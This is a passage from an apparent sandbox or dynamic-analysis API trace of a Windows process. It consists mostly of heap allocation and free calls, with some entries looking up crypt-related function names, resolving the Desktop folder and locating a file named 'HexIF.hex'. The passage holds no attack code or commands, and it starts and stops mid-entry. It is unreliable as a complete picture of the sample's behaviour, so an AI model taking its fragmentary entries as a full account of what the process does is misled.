hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0165.290] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0165.291] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0165.291] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0165.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0165.292] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0165.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0165.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0165.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0165.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0165.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0165.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0165.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0165.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0165.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0165.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0165.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0165.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0165.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0165.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0165.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0165.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0165.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0165.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0165.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0165.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0165.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0165.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0165.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0165.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0165.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0165.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0165.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0165.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0165.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0165.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0165.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0165.298] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexIF.hex", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cb3f4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3cb3f4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="HexIF.hex", cAlternateFileName="")) returned 0xa87250 [0165.298] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0165.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0165.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0165.299] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0165.300] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0165.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0165.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0165.300] PeekMessageW (in: 